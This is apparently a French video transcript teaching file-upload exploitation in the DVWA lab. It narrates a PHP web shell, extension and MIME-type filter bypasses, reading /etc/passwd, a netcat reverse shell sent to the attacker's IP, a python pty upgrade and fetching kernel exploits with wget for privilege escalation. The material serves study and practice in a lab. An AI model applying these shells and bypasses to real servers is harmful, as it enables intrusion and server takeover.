Bonjour à tous, aujourd'hui je vais vous expliquer comment exploiter les différents espaces d'upload qu'on peut trouver sur un site web. Donc avant tout, il faut savoir que l'ensemble du contenu de cette vidéo est proposé gratuitement et exclusivement à des fins pédagogiques pour mieux apprendre à se protéger. C'est de l'ethical hacking. Je ne suis en aucun cas responsable des actes réalisés par les personnes qui regardent cette vidéo. Merci d'avance. Je disais je vous montre comment exploiter les espaces d'upload. Ça peut par exemple être un site qui vous autorise à uploader une image, un avatar par exemple, ou un PDF ou un docx. Et derrière, on va détourner cette fonction pour uploader autre chose, par exemple un script PHP pour avoir un reverse shell ou équivalent pour prendre le contrôle de la machine cible avec différentes techniques. Si le serveur cible a mis des protections en place au niveau de la zone d'upload pour nous permettre d'arriver à nos fins. La version simple, c'est le file upload simple, on va dire. C'est uploader tout simplement un script PHP, ensuite l'appeler sur la barre d'adresse, un web shell ou qu'on a fait nous-mêmes ou qu'on a pris sur internet. Et puis derrière, on a le contrôle du serveur tout simplement. C'est la méthode, voilà, on va rien dire, sans commentaire. Ensuite, il y a le file upload double extension. En fait, si jamais l'admin a été un tout petit peu plus malin et qu'il a mis un filtrage sur les extensions des fichiers qu'on peut uploader, dans ce cas-là, en fait, on ne peut pas uploader de .php ni de HTML, etc., etc. Il autorise que les JPEG, PNG et compagnie. Dans ce cas-là, qu'est-ce qu'on fait? On fait notre script .php, .jpeg. Et derrière, en fait, on l'appelle avec la barre d'adresse et il fonctionnera. Si jamais l'admin a mis des protections un petit peu au-dessus et que il a filtré pour la double extension, dans ce cas-là, on va utiliser ce qu'on appelle en fait le null byte. Null byte, en gros, c'est ça, c'est shell.php %00.jpeg. Alors en fait, au niveau de la machine, elle s'arrête où %00 c'est le caractère nul. Tout ça n'est pas pris en compte, ce qui fait quand on va l'appeler, et ben en fait ça appellera shell.php. C'est ça le null byte. Ensuite, il y a le file upload type mime change. En fait, le type mime, c'est par exemple, on consulte une image via une requête get sur un site. Ben, le type mime de cette image simple, ce sera picture, ce sera image. Nous, ce qu'on fait, c'est qu'on va prendre on va dire un fichier qui à la base, il s'appelle le fichier à la base, il s'appelle mon image. Oups, mon image.jpeg. On l'envoie. Le check dit que c'est OK côté serveur. Ensuite, nous, on proxifie la requête. On la stop. On la reforge. Et on la renomme mon image.php. Et on l'upload. Évidemment, mon image.php, en fait, c'est un web shell. On envoie, le check est fait. Côté proxy, avec Burp ou avec HTTP headers sur Firefox, on stoppe la requête, on change le type mime pour dire que c'est une image alors que c'est un fichier PHP. Il y a différentes façons de faire. On peut très bien directement balancer un PHP qui du coup sera marqué comme un fichier PHP. On le change le type mime en image et le serveur va très bien l'accepter. Là j'ai mis une version, on va dire, parcours du combattant. Voilà, on a un petit peu fait le tour côté théorique. Donc dans cette vidéo, je pourrais vous montrer ces trois parties-là. Celle-là, ça sera pour une prochaine parce que c'est pas inclus dans le lab du jour. Et c'est parti. Pour vous illustrer les exemples, j'utilise l'outil qui s'appelle DVWA, qui signifie DAM, le Vulnerable Web Application.
Il est téléchargeable sur internet. En fait, c'est un ISO, c'est une petite VM avec différents types d'attaques disponibles sur le standard OWASP. Dans notre cas, on va essayer donc le file upload. Il suffit d'aller dans upload, se rendre évidemment sur l'URL. Pardon. Alors du coup, une fois qu'on est dessus, ce que j'ai fait pour que ça soit un petit peu plus galère, je suis allé dans DVWA Security, j'ai mis en LV et j'ai activé le PHP IDS. Donc on revient sur Upload. Alors c'est ici en fait qu'on peut uploader des images, etc. Donc avant de faire ça, on va se mettre, donc on va se faire notre petit shell. Donc on va l'appeler shell.php. Voilà. Donc ce qu'on met dedans, c'est en fait on va utiliser la commande système, donc il va appeler une commande directement Linux. Et là on va utiliser le get. C'est pas le bon tiret. Voilà, on fait un get command. Alors en fait le get command en gros c'est pour dire qu'on va via la barre d'URL faire le site /upload /shell.php point d'interrogation commande égale, et là on met par exemple ls. Donc en fait c'est l'argument numéro 1 attendu en entrée du script. Voilà, c'est tout simple. Une fois que c'est fait, on retourne sur notre site, on fait parcourir, et là on a notre shell.php, on fait upload, et là qu'est-ce qui se passe? L'image n'a pas été uploadée. Donc si j'avais retiré l'IDS PHP, il l'aurait accepté, mais comme il est activé, il refuse le format .php, il n'accepte pas les scripts PHP. Donc qu'est-ce qu'on fait? Eh ben, au lieu de l'appeler shell.php, on va l'appeler shell.php.jpeg. Voilà, désolé avec le fond d'écran, on voit pas bien. On revient, on fait parcourir. Donc là, il a l'extension qu'il attend, à savoir un JPEG. On fait upload, et là, magie, il a accepté. Donc c'est très bien. Donc là, on voit qu'il y a deux fois ça, donc c'est deux niveaux avant. Donc c'est ici, c'est après DVWA qu'il faut mettre cette URL. Donc du coup, ici, on colle ça, comme c'est indiqué ici. On fait entrer. Et on arrive sur notre shell. Donc il y a marqué warning system cannot execute a blank command. Donc en fait, il ne peut pas exécuter une commande vide, sans argument. Ce qu'on fait, c'est qu'on met point d'interrogation, commande, comme dans le script, égal. Et là, il ne va rien se passer, c'est pareil. Mais si on met un ls, ben là, il se passe des choses. On voit le contenu du dossier courant. Si on met un ls/etc, on voit le contenu de /etc. Oui, je vous conseille de mettre en mode afficher le code source, parce qu'il y a une mise en forme qui est faite, on voit un petit peu mieux. Par exemple, si on fait un cat /etc/passwd, ben là il s'affiche très bien. Tandis que là, il va s'afficher sur une seule ligne en fait. Là c'est beaucoup plus lisible. On voit les différents users du système. Donc là c'est à l'imagination de chacun. Hein. Donc on peut par exemple regarder quels users ont accès à un shell. Pour faire ça, on fait un cat /etc passwd et on fait un grep qui a accès au bin bash par exemple, hein, c'est un exemple. Ça peut être bin sh. On voit que il y a 5 utilisateurs qui ont accès au shell. On voit leur groupe, leur nom. C'est un exemple de ce qu'on peut faire. On regarde c'est quoi l'ID de l'utilisateur courant. On voit que c'est www.data, c'est l'utilisateur du serveur web Apache avec l'ID 33. Ce qu'on peut faire aussi, c'est en fait invoquer un reverse shell. Donc pour ce faire, on va utiliser nc. Je vais réduire un petit peu pour qu'on puisse quand même voir. Donc pour ça, on va faire un petit nc en verbose-l-p. Donc le -p c'est pour le port. On va mettre 1337.
Voilà, donc là mon PC et on écoute sur toutes les IP sur le port 1337. Il attend la réception d'un shell. Du coup là on fait un nc-e et on lui dit qu'est-ce qu'on envoie. Donc là on va envoyer pardon, c'est slash bin bash plutôt. Ensuite on lui donne l'IP de l'attaquant. Donc là c'est mon IP à moi. Je crois que c'est 26. Ensuite le port sur lequel on lui envoie le shell. On fait entrer. J'ai dû me tromper quelque part. Mon avis l'IP n'est pas bonne. Pour ça. Si elle était bonne. Donc j'ai bien reçu le shell. On voit ici. Hein, inverse host connected to. Donc là je suis connecté. Si on fait un petit ls, on voit que ça fonctionne. Ça nous affiche bien les fichiers. Si on fait un cat passe wd, il s'affiche bien. Si on regarde l'ID, c'est toujours 3wdata. Ensuite, ce qu'on peut faire pour que ça soit un petit peu plus sympa, on peut invoquer en fait le bash via Python. Donc on fait une invocation, on fait un python-c. Ensuite, on va utiliser donc un module Python. C'est import alors comment il s'appelle? J'ai oublié son nom. Type, je sais plus. Je vais regarder, attendez. Tic, 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 tic. C'est PTI, ouais, j'avais un doute. PTI, donc c'est python-c import PTI. Un point virgule, c'est pour, on va dire, aller à la ligne. Ensuite, on fait PTI.spawn. Et là, en fait, on va appeler slash bin slash bash, ouais, en l'occurrence, sh plutôt. Et voilà. Voilà, donc du coup, c'est un petit peu mieux. Parce que là, on peut activer l'autocomplétion, on fait un petit peu ce qu'on veut. Et derrière, en fait, on a avec l'utilisateur 3wdata, si on souhaite, c'est, je pense, pas bien compliqué de trouver de quoi router la machine. On fait uname-a, on a le kernel, c'est un 2624. Alors on va sur kernel, kernel exploit, je crois. Oui, c'est ça, kernel exploit. Ce site référence en fait les failles pour faire de l'escale de privilèges sur différentes versions de kernel Linux. Donc là on met 2624, il va nous dire s'il y a des vulnérabilités disponibles. On voit qu'en fait il y en a quelques-unes quand même. Si on prend par exemple celle-ci, on voit qu'il y a les sources. Oups, on peut pas faire un copier-coller. Apparemment non. Bon tant pis. Donc là on l'a téléchargé. Du coup ce qu'on peut faire, c'est si on peut, je sais pas trop, on fait copier l'adresse du lien. On revient sur notre terminal, on fait un wget. Ça lui a pas plu. Wget no check certificate pour pas qu'il check en fait le SSL. Ça n'a pas l'air de lui plaire du tout.